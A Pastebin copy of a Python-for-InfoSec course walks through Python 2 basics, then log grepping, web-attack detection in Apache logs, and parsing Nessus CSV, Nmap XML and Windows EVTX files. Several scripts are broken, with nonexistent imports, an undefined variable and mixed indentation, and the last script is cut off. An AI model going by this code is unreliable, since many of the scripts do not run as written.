SHARE
TWEET

Learning Python

djtroby May 31st, 2017 75 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Here is the Day 1 Video:
  2. https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_5_rec-lw-us-4_240269_recording.mp4
  3.  
  4. Here is the Day 2 Video:
  5. https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_7_rec-hq-3_241310_recording.mp4
  6.  
  7. Here is the Day 3 Video:
  8. https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_11_rec-lw-us-7_243144_recording.mp4
  9.  
  10. Here is the Day 4 Video:
  11. https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_14_rec-hq-6_244377_recording.mp4
  12.  
  13. Here is the Day 5 Video:
  14. https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_18_rec-hq-6_246395_recording.mp4
  15.  
  16. Here is the Day 6 Video:
  17. https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_20_rec-hq-2_247633_recording.mp4
  18.  
  19.  
  20. #########################################
  21. # Here is the courseware for this month #
  22. #########################################
  23.  
  24. Class powerpoint slides:
  25. https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx
  26.  
  27.  
  28.  
  29. Courseware Lab Manual
  30. https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf
  31.  
  32.  
  33.  
  34. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
  35.         username: strategicsec
  36.         password: strategicsec
  37.  
  38.  
  39. The youtube video playlist that I'd like for you to watch is located here:
  40. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
  41.  
  42.  
  43. ##############################
  44. # Installing Python in Linux #
  45. ##############################
  46. The first thing that you will need to do is install dpkt.
  47.  
  48. sudo apt-get install -y idle
  49.  
  50. Open IDLE, and let's just dive right in.
  51.  
  52.  
  53.  
  54.  
  55. #############################
  56. # Lesson 1: Simple Printing #
  57. #############################
  58.  
  59. >>> print "Today we are learning Python."
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66. #####################################
  67. # Lesson 2: Simple Numbers and Math #
  68. #####################################
  69.  
  70. >>> 2+2
  71.  
  72. >>> 6-3
  73.  
  74. >>> 18/7
  75.  
  76. >>> 18.0/7
  77.  
  78. >>> 18.0/7.0
  79.  
  80. >>> 18/7
  81.  
  82. >>> 9%4
  83.  
  84. >>> 8%4
  85.  
  86. >>> 8.75%.5
  87.  
  88. >>> 6.*7
  89.  
  90. >>> 6*6*6
  91.  
  92. >>> 6**3
  93.  
  94. >>> 5**12
  95.  
  96. >>> -5**4
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103. #######################
  104. # Lesson 3: Variables #
  105. #######################
  106.  
  107. >>> x=18
  108.  
  109. >>> x+15
  110.  
  111. >>> x**3
  112.  
  113. >>> y=54
  114.  
  115. >>> x+y
  116.  
  117. >>> g=input("Enter number here: ")
  118.     43
  119.  
  120. >>> g+32
  121.  
  122. >>> g**3
  123.  
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130.  
  131. ###################################
  132. # Lesson 4: Modules and Functions #
  133. ###################################
  134.  
  135. >>> 5**4
  136.  
  137. >>> pow(5,4)
  138.  
  139. >>> abs(-18)
  140.  
  141. >>> abs(5)
  142.  
  143. >>> floor(18.7)
  144.  
  145. >>> import math
  146.  
  147. >>> math.floor(18.7)
  148.  
  149. >>> math.sqrt(81)
  150.  
  151. >>> joe = math.sqrt
  152.  
  153. >>> joe(9)
  154.  
  155. >>> joe=math.floor
  156.  
  157. >>> joe(19.8)
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164.  
  165. ##################################
  166. # Lesson 5: How to Save Programs #
  167. ##################################
  168. Run "IDLE (Python GUI)"
  169.  
  170. File -> New Window
  171.  
  172. print "Python for InfoSec"
  173.  
  174. File -> Save as
  175.     py4InfoSec.py
  176.  
  177. Run -> Run Module or Press "F5"
  178.  
  179.  
  180.  
  181.  
  182.  
  183. Create a file name.py
  184.  
  185. x = raw_input("Enter name: ")
  186. print "Hey " + x
  187. raw_input("Press<enter>")
  188.  
  189.  
  190. Run -> Run Module or Press "F5"
  191.  
  192.  
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199. #####################
  200. # Lesson 6: Strings #
  201. #####################
  202.  
  203. >>> "XSS"
  204.  
  205. >>> 'SQLi'
  206.  
  207. >>> "Joe's a python lover"
  208.  
  209. >>> 'Joe\'s a python lover'
  210.  
  211. >>> "Joe said \"InfoSec is fun\" to me"
  212.  
  213. >>> a = "Joe"
  214.  
  215. >>> b = "McCray"
  216.  
  217. >>> a, b
  218.  
  219. >>> a+b
  220.  
  221.  
  222.  
  223.  
  224.  
  225.  
  226.  
  227.  
  228. ##########################
  229. # Lesson 7: More Strings #
  230. ##########################
  231.  
  232. >>> num = 10
  233.  
  234. >>> num + 2
  235.  
  236. >>> "The number of open ports found on this system is " + num
  237.  
  238. >>> num = str(18)
  239.  
  240. >>> "There are " + num + " vulnerabilities found in this environment."
  241.  
  242. >>> num2 = 46
  243.  
  244. >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
  245.  
  246.  
  247.  
  248.  
  249.  
  250.  
  251.  
  252.  
  253. #######################
  254. # Lesson 8: Raw Input #
  255. #######################
  256. Run "IDLE (Python GUI)"
  257.  
  258. File -> New Window
  259.  
  260. joemccray=input("Enter name: ")
  261. print joemccray
  262.  
  263.  
  264.  
  265. Run -> Run Module               # Will throw an error
  266.     or
  267. Press "F5"
  268.  
  269. File -> New Window
  270. joemccray=raw_input("Enter name: ")
  271.  
  272. Run -> Run Module               # Will throw an error
  273.  
  274.     or
  275.  
  276. Press "F5"
  277.  
  278. NOTE:
  279. Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
  280.  
  281.  
  282.  
  283.  
  284.  
  285.  
  286.  
  287. #################################
  288. # Lesson 9: Sequences and Lists #
  289. #################################
  290.  
  291. >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  292.  
  293. >>> attacks
  294. ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  295.  
  296. >>> attacks[3]
  297. 'SQL Injection'
  298.  
  299. >>> attacks[-2]
  300. 'Cross-Site Scripting'
  301.  
  302.  
  303.  
  304.  
  305.  
  306.  
  307. ##########################
  308. # Level 10: If Statement #
  309. ##########################
  310. Run "IDLE (Python GUI)"
  311.  
  312. File -> New Window
  313. attack="SQLI"
  314. if attack=="SQLI":
  315.     print 'The attacker is using SQLI'
  316.  
  317.  
  318.  
  319. Run -> Run Module   or  Press "F5"
  320.  
  321. File >> New Window
  322. attack="XSS"
  323. if attack=="SQLI":
  324.     print 'The attacker is using SQLI'
  325.  
  326.  
  327. Run -> Run Module   or  Press "F5"
  328.  
  329.  
  330.  
  331. #############################
  332. # Reference Videos To Watch #
  333. #############################
  334. Here is your first set of youtube videos that I'd like for you to watch:
  335. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
  336.  
  337.  
  338.  
  339.  
  340.  
  341. #####################################
  342. # Lession 11: Intro to Log Analysis #
  343. #####################################
  344.  
  345. Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
  346.  
  347. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
  348.        username: strategicsec
  349.        password: strategicsec
  350.  
  351. Then execute the following commands:
  352. ---------------------------------------------------------------------------------------------------------
  353.  
  354.  
  355. wget https://s3.amazonaws.com/SecureNinja/Python/access_log
  356.  
  357.  
  358. cat access_log | grep 141.101.80.188
  359.  
  360. cat access_log | grep 141.101.80.187
  361.  
  362. cat access_log | grep 108.162.216.204
  363.  
  364. cat access_log | grep 173.245.53.160
  365.  
  366. ---------------------------------------------------------
  367.  
  368. Google the following terms:
  369.     - Python read file
  370.     - Python read line
  371.     - Python read from file
  372.  
  373.  
  374.  
  375.  
  376. #########################################################
  377. # Lession 12: Use Python to read in a file line by line #
  378. #########################################################
  379.  
  380.  
  381. Reference:
  382. http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
  383.  
  384.  
  385.  
  386. ---------------------------------------------------------
  387. vi logread1.py
  388.  
  389.  
  390. ## Open the file with read only permit
  391. f = open('access_log', "r")
  392.  
  393. ## use readlines to read all lines in the file
  394. ## The variable "lines" is a list containing all lines
  395. lines = f.readlines()
  396.  
  397. print lines
  398.  
  399.  
  400. ## close the file after reading the lines.
  401. f.close()
  402.  
  403. ---------------------------------------------------------
  404.  
  405.  
  406. Google the following:
  407.     - python difference between readlines and readline
  408.     - python readlines and readline
  409.  
  410.  
  411.  
  412.  
  413.  
  414. #################################
  415. # Lession 13: A quick challenge #
  416. #################################
  417.  
  418. Can you write an if/then statement that looks for this IP and print "Found it"?
  419.  
  420.  
  421. 141.101.81.187
  422.  
  423.  
  424.  
  425.  
  426.  
  427.  
  428. ---------------------------------------------------------
  429. Hint 1: Use Python to look for a value in a list
  430.  
  431. Reference:
  432. http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
  433.  
  434.  
  435.  
  436.  
  437. ---------------------------------------------------------
  438. Hint 2: Use Python to prompt for user input
  439.  
  440. Reference:
  441. http://www.cyberciti.biz/faq/python-raw_input-examples/
  442.  
  443.  
  444.  
  445.  
  446. ---------------------------------------------------------
  447. Hint 3: Use Python to search for a string in a list
  448.  
  449. Reference:
  450. http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
  451.  
  452.  
  453.  
  454.  
  455. Here is one student's solution - can you please this code to me?
  456.  
  457. #!/usr/bin/python
  458.  
  459. f = open('access_log')
  460.  
  461. strUsrinput = raw_input("Enter IP Address: ")
  462.  
  463. for line in iter(f):
  464.    ip = line.split(" - ")[0]
  465.    if ip == strUsrinput:
  466.        print line
  467.  
  468. f.close()
  469.  
  470.  
  471.  
  472.  
  473. -------------------------------
  474.  
  475. Working with another student after class we came up with another solution:
  476.  
  477. #!/usr/bin/env python
  478.  
  479.  
  480. # This line opens the log file
  481. f=open('access_log',"r")
  482.  
  483. # This line takes each line in the log file and stores it as an element in the list
  484. lines = f.readlines()
  485.  
  486.  
  487. # This lines stores the IP that the user types as a var called userinput
  488. userinput = raw_input("Enter the IP you want to search for: ")
  489.  
  490.  
  491.  
  492. # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
  493. for ip in lines:
  494.    if ip.find(userinput) != -1:
  495.        print ip
  496.  
  497.  
  498.  
  499. ##################################################
  500. # Lession 14: Look for web attacks in a log file #
  501. ##################################################
  502.  
  503. In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
  504. Supported attacks:
  505. 1.      SQL Injection
  506. 2.      Local File Inclusion
  507. 3.      Remote File Inclusion
  508. 4.      Cross-Site Scripting
  509.  
  510.  
  511.  
  512. wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
  513.  
  514. The usage for scan_log.py is simple.  You feed it an apache log file.
  515.  
  516. cat scan_log.py | less          (use your up/down arrow keys to look through the file)
  517.  
  518. Explain to me how this script works.
  519.  
  520.  
  521.  
  522. ################################
  523. # Lesson 15: Parsing CSV Files #
  524. ################################
  525.  
  526. Dealing with csv files
  527.  
  528. Reference:
  529. http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
  530.  
  531. Type the following commands:
  532. ---------------------------------------------------------------------------------------------------------
  533.  
  534. wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv
  535.  
  536.  
  537. Example 1 - Reading CSV files
  538. -----------------------------
  539. #To be able to read csv formated files, we will first have to import the
  540. #csv module.
  541.  
  542.  
  543. import csv
  544. with open('class_nessus.csv', 'rb') as f:
  545.    reader = csv.reader(f)
  546.    for row in reader:
  547.        print row
  548.  
  549.  
  550.  
  551.  
  552.  
  553.  
  554. Example 2 - Reading CSV files
  555. -----------------------------
  556. vi readcsv.py
  557.  
  558.  
  559. #!/usr/bin/python
  560. import csv                  # imports the csv module
  561. import sys                  # imports the sys module
  562.  
  563. f = open(sys.argv[1], 'rb')         # opens the csv file
  564. try:
  565.     reader = csv.reader(f)          # creates the reader object
  566.     for row in reader:          # iterates the rows of the file in orders
  567.         print row               # prints each row
  568. finally:
  569.     f.close()               # closing
  570.  
  571.  
  572.  
  573.  
  574.  
  575.  
  576. Example 3 - - Reading CSV files
  577. -------------------------------
  578. vi readcsv2.py
  579.  
  580.  
  581. #!/usr/bin/python
  582. # This program will then read it and displays its contents.
  583.  
  584.  
  585. import csv
  586.  
  587. ifile  = open('class_nessus.csv', "rb")
  588. reader = csv.reader(ifile)
  589.  
  590. rownum = 0
  591. for row in reader:
  592.    # Save header row.
  593.    if rownum == 0:
  594.        header = row
  595.    else:
  596.        colnum = 0
  597.        for col in row:
  598.            print '%-8s: %s' % (header[colnum], col)
  599.            colnum += 1
  600.            
  601.    rownum += 1
  602.  
  603. ifile.close()
  604.  
  605.  
  606.  
  607.  
  608.  
  609.  
  610.  
  611.  
  612. python readcsv2.py | less
  613.  
  614.  
  615.  
  616.  
  617.  
  618.  
  619.  
  620.  
  621. /---------------------------------------------------/    
  622. --------------------PARSING CSV FILES----------------
  623. /---------------------------------------------------/
  624.  
  625. -------------TASK 1------------
  626. vi readcsv3.py
  627.  
  628. #!/usr/bin/python
  629. import csv
  630. f = open('class_nessus.csv', 'rb')
  631. try:
  632.    rownum = 0
  633.    reader = csv.reader(f)
  634.    for row in reader:
  635.         #Save header row.
  636.        if rownum == 0:
  637.            header = row
  638.        else:
  639.            colnum = 0
  640.            if row[3].lower() == 'high':
  641.                print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  642.        rownum += 1
  643. finally:
  644.    f.close()
  645.  
  646.  
  647.  
  648.  
  649.  
  650. python readcsv3.py | less
  651.    
  652. -------------TASK 2------------
  653. vi readcsv4.py
  654.  
  655. #!/usr/bin/python
  656. import csv
  657. f = open('class_nessus.csv', 'rb')
  658. try:
  659.    print '/---------------------------------------------------/'
  660.    rownum = 0
  661.    hosts = {}
  662.    reader = csv.reader(f)
  663.    for row in reader:
  664.        # Save header row.
  665.        if rownum == 0:
  666.            header = row
  667.        else:
  668.            colnum = 0
  669.            if row[3].lower() == 'high' and row[4] not in hosts:
  670.                hosts[row[4]] = row[4]
  671.                print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  672.        rownum += 1
  673. finally:
  674.    f.close()
  675.  
  676.  
  677. python readcsv4.py | less
  678.  
  679.  
  680.  
  681.  
  682.  
  683. ################################
  684. # Lesson 16: Parsing XML Files #
  685. ################################
  686.    
  687. /---------------------------------------------------/    
  688. --------------------PARSING XML FILES----------------
  689. /---------------------------------------------------/
  690.  
  691.  
  692. Type the following commands:
  693. ---------------------------------------------------------------------------------------------------------
  694.  
  695. wget https://s3.amazonaws.com/SecureNinja/Python/samplescan.xml
  696.  
  697. wget https://s3.amazonaws.com/SecureNinja/Python/application.xml
  698.  
  699. wget https://s3.amazonaws.com/SecureNinja/Python/security.xml
  700.  
  701. wget https://s3.amazonaws.com/SecureNinja/Python/system.xml
  702.  
  703. wget https://s3.amazonaws.com/SecureNinja/Python/sc_xml.xml
  704.  
  705.  
  706.  
  707. -------------TASK 1------------
  708. vi readxml1.py
  709.  
  710. #!/usr/bin/python
  711. from xmllib import attributes
  712. from xml.dom.minidom import toxml
  713. from xml.dom.minidom import firstChild
  714. from xml.dom import minidom
  715. xmldoc = minidom.parse('sc_xml.xml')
  716. grandNode = xmldoc.firstChild
  717. nodes = grandNode.getElementsByTagName('host')
  718. count = 0
  719.  
  720. for node in nodes:
  721.    os = node.getElementsByTagName('os')[0]
  722.    osclasses = os.getElementsByTagName('osclass')
  723.    for osclass in osclasses:
  724.        if osclass.attributes['osfamily'].value == 'Windows' and osclass.attributes['osgen'].value == 'XP':
  725.            try:
  726.                print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
  727.            except:
  728.                print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
  729.  
  730.  
  731.  
  732.  
  733.  
  734. -------------TASK 2------------
  735. vi readxml2.py
  736.  
  737. #!/usr/bin/python
  738. from xmllib import attributes
  739. from xml.dom.minidom import toxml
  740. from xml.dom.minidom import firstChild
  741. from xml.dom import minidom
  742. xmldoc = minidom.parse('sc_xml.xml')
  743. grandNode = xmldoc.firstChild
  744. nodes = grandNode.getElementsByTagName('host')
  745. count = 0
  746. for node in nodes:
  747.    portsNode = node.getElementsByTagName('ports')[0]
  748.    ports = portsNode.getElementsByTagName('port')
  749.    for port in ports:
  750.        if port.attributes['portid'].value == '22' and port.attributes['protocol'].value == 'tcp':
  751.            state = port.getElementsByTagName('state')[0]
  752.            if state.attributes['state'].value == 'open':
  753.                try:
  754.                    print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : 22')
  755.                except:
  756.                    print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : 22')
  757.  
  758.  
  759.  
  760.  
  761. -------------TASK 3------------
  762. vi readxml3.py
  763.  
  764. #!/usr/bin/python
  765. from xmllib import attributes
  766. from xml.dom.minidom import toxml
  767. from xml.dom.minidom import firstChild
  768. from xml.dom import minidom
  769. xmldoc = minidom.parse('sc_xml.xml')
  770. grandNode = xmldoc.firstChild
  771. nodes = grandNode.getElementsByTagName('host')
  772. count = 0
  773. for node in nodes:
  774.    portsNode = node.getElementsByTagName('ports')[0]
  775.    ports = portsNode.getElementsByTagName('port')
  776.    flag = 0
  777.    for port in ports:
  778.        if flag == 0:
  779.            if port.attributes['protocol'].value == 'tcp' and (port.attributes['portid'].value == '443' or port.attributes['portid'].value == '80'):
  780.                state = port.getElementsByTagName('state')[0]
  781.                if state.attributes['state'].value == 'open':
  782.                    try:
  783.                        print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : '+port.attributes['portid'].value)
  784.                    except:
  785.                        print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : '+port.attributes['portid'].value)
  786.                    flag = 1
  787.  
  788.  
  789.  
  790.  
  791. -------------TASK 4------------
  792. vi readxml4.py
  793.  
  794. #!/usr/bin/python
  795. from xmllib import attributes
  796. from xml.dom.minidom import toxml
  797. from xml.dom.minidom import firstChild
  798. from xml.dom import minidom
  799. xmldoc = minidom.parse('sc_xml.xml')
  800. grandNode = xmldoc.firstChild
  801. nodes = grandNode.getElementsByTagName('host')
  802. count = 0
  803. for node in nodes:
  804.    flag = 0
  805.    naddress = ''
  806.    addresses = node.getElementsByTagName('address')
  807.    for address in addresses:
  808.        if address.attributes['addrtype'].value == 'ipv4' and address.attributes['addr'].value[0:6] == '10.57.':
  809.            naddress = address.attributes['addr'].value
  810.            flag = 1
  811.    if flag == 1:
  812.        portsNode = node.getElementsByTagName('ports')[0];
  813.        ports = portsNode.getElementsByTagName('port')
  814.        flag = 0
  815.        for port in ports:
  816.                status = {}
  817.                if port.attributes['protocol'].value == 'tcp' and port.attributes['portid'].value[0:2] == '22':
  818.                    state = port.getElementsByTagName('state')[0]
  819.                    if "open" in state.attributes['state'].value:
  820.                        status[0] = state.attributes['state'].value
  821.                        status[1] = port.attributes['portid'].value
  822.                        flag = 1
  823.                else:
  824.                    flag = 0    
  825.                if port.attributes['protocol'].value == 'tcp' and flag == 1:
  826.                    if port.attributes['portid'].value == '80' or port.attributes['portid'].value == '443':
  827.                        state = port.getElementsByTagName('state')[0]
  828.                        if state.attributes['state'].value == 'open':
  829.                            flag = 0
  830.                            try:
  831.                                print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
  832.                            except:
  833.                                print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
  834.  
  835.  
  836.  
  837. ################################
  838. # Lesson 17: Parsing EVTX Logs #
  839. ################################
  840. /---------------------------------------------------/    
  841. --------------------PARSING EVTX FILES----------------
  842. /---------------------------------------------------/
  843.  
  844.  
  845. Type the following commands:
  846. ---------------------------------------------------------------------------------------------------------
  847.  
  848. wget https://s3.amazonaws.com/SecureNinja/Python/Program-Inventory.evtx
  849.  
  850. wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Application.evtx
  851.  
  852. wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Security.evtx
  853.  
  854. wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_System.evtx
  855.  
  856.  
  857.  
  858.  
  859. -------------TASK 1------------
  860. vi readevtx1.py
  861.  
  862. import mmap
  863. import re
  864. import contextlib
  865. import sys
  866. import operator
  867. import HTMLParser
  868. from xml.dom import minidom
  869. from operator import itemgetter, attrgetter
  870.  
  871. from Evtx.Evtx import FileHeader
  872. from Evtx.Views import evtx_file_xml_view
  873.  
  874. pars = HTMLParser.HTMLParser()
  875. print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
  876. file_name = str(raw_input('Enter EVTX file name without extension : '))
  877. file_name = 'WIN-M751BADISCT_System'
  878. with open(file_name+'.evtx', 'r') as f:
  879.    with contextlib.closing(mmap.mmap(f.fileno(), 0,
  880.                                      access=mmap.ACCESS_READ)) as buf:
  881.        fh = FileHeader(buf, 0x0)
  882.        xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
  883.        try:
  884.            for xml, record in evtx_file_xml_view(fh):
  885.                xml_file += xml
  886.        except:
  887.            pass
  888.        xml_file += "</Events>"
  889. xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
  890. xml_file = re.sub('<local>', '<local></local>', xml_file)
  891. xml_file = re.sub('&amp;', '&amp;', xml_file)
  892. f = open(file_name+'.xml', 'w')
  893. f.write(xml_file)
  894. f.close()
  895. try:
  896.    xmldoc = minidom.parse(file_name+'.xml')
  897. except:
  898.    sys.exit('Invalid file...')
  899. grandNode = xmldoc.firstChild
  900. nodes = grandNode.getElementsByTagName('Event')
  901.  
  902.  
  903. event_num = int(raw_input('How many events you want to show : '))
  904. length = int(len(nodes)) - 1
  905. event_id = 0
  906. if event_num > length:
  907.    sys.exit('You have entered an ivalid num...')
  908. while True:
  909.    if event_num > 0 and length > -1:
  910.        try:
  911.            event_id = nodes[length].getElementsByTagName('EventID')[0].childNodes[0].nodeValue
  912.            try:
  913.                print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
  914.            except:
  915.                print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
  916.            event_num -= 1
  917.            length -= 1
  918.        except:
  919.            length -= 1
  920.    else:
  921.        sys.exit('...Search Complete...')
  922.    
  923.  
  924.  
  925. -------------TASK 2------------
  926. vi readevtx2.py
  927.  
  928. import mmap
  929. import re
  930. import contextlib
  931. import sys
  932. import operator
  933. import HTMLParser
  934. from xml.dom import minidom
  935. from operator import itemgetter, attrgetter
  936.  
  937. from Evtx.Evtx import FileHeader
  938. from Evtx.Views import evtx_file_xml_view
  939.  
  940. pars = HTMLParser.HTMLParser()
  941. print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
  942. file_name = str(raw_input('Enter EVTX file name without extension : '))
  943. file_name = 'WIN-M751BADISCT_System'
  944. with open(file_name+'.evtx', 'r') as f:
  945.    with contextlib.closing(mmap.mmap(f.fileno(), 0,
  946.                                      access=mmap.ACCESS_READ)) as buf:
  947.        fh = FileHeader(buf, 0x0)
  948.        xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
  949.         try:
  950.             for xml, record in evtx_file_xml_view(fh):
  951.                 xml_file += xml
  952.         except:
  953.             pass
  954.         xml_file += "</Events>"
  955. xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
  956. xml_file = re.sub('<local>', '<local></local>', xml_file)
  957. xml_file = re.sub('&amp;', '&amp;', xml_file)
  958. f = open(file_name+'.xml', 'w')
  959. f.write(xml_file)
  960. f.close()
  961. try:
  962.     xmldoc = minidom.parse(file_name+'.xml')
  963. except:
  964.     sys.exit('Invalid file...')
  965. grandNode = xmldoc.firstChild
  966. nodes = grandNode.getElementsByTagName('Event')
  967.  
  968. event = int(raw_input('Enter Event ID : '))
  969. event_id = 0
  970. for node in nodes:
  971.     try:
  972.         event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
  973.         if int(event_id) == event:
  974.             try:
  975.                 print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
  976.             except:
  977.                 print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
  978.     except:
  979.         continue
  980. sys.exit('...Search Complete...')
  981.    
  982.  
  983.  
  984. -------------TASK 3------------
  985. vi readevtx3.py
  986.  
  987. import mmap
  988. import re
  989. import contextlib
  990. import sys
  991. import operator
  992. import HTMLParser
  993. from xml.dom import minidom
  994. from operator import itemgetter, attrgetter
  995.  
  996. from Evtx.Evtx import FileHeader
  997. from Evtx.Views import evtx_file_xml_view
  998.  
  999. pars = HTMLParser.HTMLParser()
  1000. print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
  1001. file_name = str(raw_input('Enter EVTX file name without extension : '))
  1002. file_name = 'WIN-M751BADISCT_System'
  1003. with open(file_name+'.evtx', 'r') as f:
  1004.     with contextlib.closing(mmap.mmap(f.fileno(), 0,
  1005.                                       access=mmap.ACCESS_READ)) as buf:
  1006.         fh = FileHeader(buf, 0x0)
  1007.         xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
  1008.         try:
  1009.             for xml, record in evtx_file_xml_view(fh):
  1010.                 xml_file += xml
  1011.         except:
  1012.             pass
  1013.         xml_file += "</Events>"
  1014. xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
  1015. xml_file = re.sub('<local>', '<local></local>', xml_file)
  1016. xml_file = re.sub('&amp;', '&amp;', xml_file)
  1017. f = open(file_name+'.xml', 'w')
  1018. f.write(xml_file)
  1019. f.close()
  1020. try:
  1021.     xmldoc = minidom.parse(file_name+'.xml')
  1022. except:
  1023.     sys.exit('Invalid file...')
  1024. grandNode = xmldoc.firstChild
  1025. nodes = grandNode.getElementsByTagName('Event')
  1026.  
  1027. event = int(raw_input('Enter Event ID : '))
  1028. event_id = 0
  1029. event_count = 0;
  1030. for node in nodes:
  1031.     try:
  1032.         event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
  1033.         if int(event_id) == event:
  1034.             event_count += 1
  1035.     except:
  1036.         continue
  1037. print '%-8s: %s - %-8s: %s' % ('Event ID',event,'Count',event_count)
  1038. sys.exit('...Search Complete...')
  1039.    
  1040.  
  1041.  
  1042. -------------TASK 4------------
  1043. vi readevtx4.py
  1044.  
  1045. import mmap
  1046. import re
  1047. import contextlib
  1048. import sys
  1049. import operator
  1050. import HTMLParser
  1051. from xml.dom import minidom
  1052. from operator import itemgetter, attrgetter
  1053.  
  1054. from Evtx.Evtx import FileHeader
  1055. from Evtx.Views import evtx_file_xml_view
  1056.  
  1057. pars = HTMLParser.HTMLParser()
  1058. print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
  1059. file_name = str(raw_input('Enter EVTX file name without extension : '))
  1060. file_name = 'WIN-M751BADISCT_System'
  1061. with open(file_name+'.evtx', 'r') as f:
  1062.     with contextlib.closing(mmap.mmap(f.fileno(), 0,
  1063.                                       access=mmap.ACCESS_READ)) as buf:
  1064.         fh = FileHeader(buf, 0x0)
  1065.         xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
  1066.         try:
  1067.             for xml, record in evtx_file_xml_view(fh):
  1068.                 xml_file += xml
  1069.         except:
  1070.             pass
  1071.         xml_file += "</Events>"
  1072. xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
  1073. xml_file = re.sub('<local>', '<local></local>', xml_file)
  1074. xml_file = re.sub('&amp;', '&amp;', xml_file)
  1075. f = open(file_name+'.xml', 'w')
  1076. f.write(xml_file)
  1077. f.close()
  1078. try:
  1079.     xmldoc = minidom.parse(file_name+'.xml')
  1080. except:
  1081.     sys.exit('Invalid file...')
  1082. grandNode = xmldoc.firstChild
  1083. nodes = grandNode.getElementsByTagName('Event')
  1084.  
  1085. events = []
  1086. event_id = 0
  1087. count = 0
  1088. for node in nodes:
  1089.     try:
  1090.         event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
  1091.         try:
  1092.             events.append({'event_id' : int(event_id), 'event_name' : node.getElementsByTagName('string')[1].childNodes[0].nodeValue})
  1093.         except:
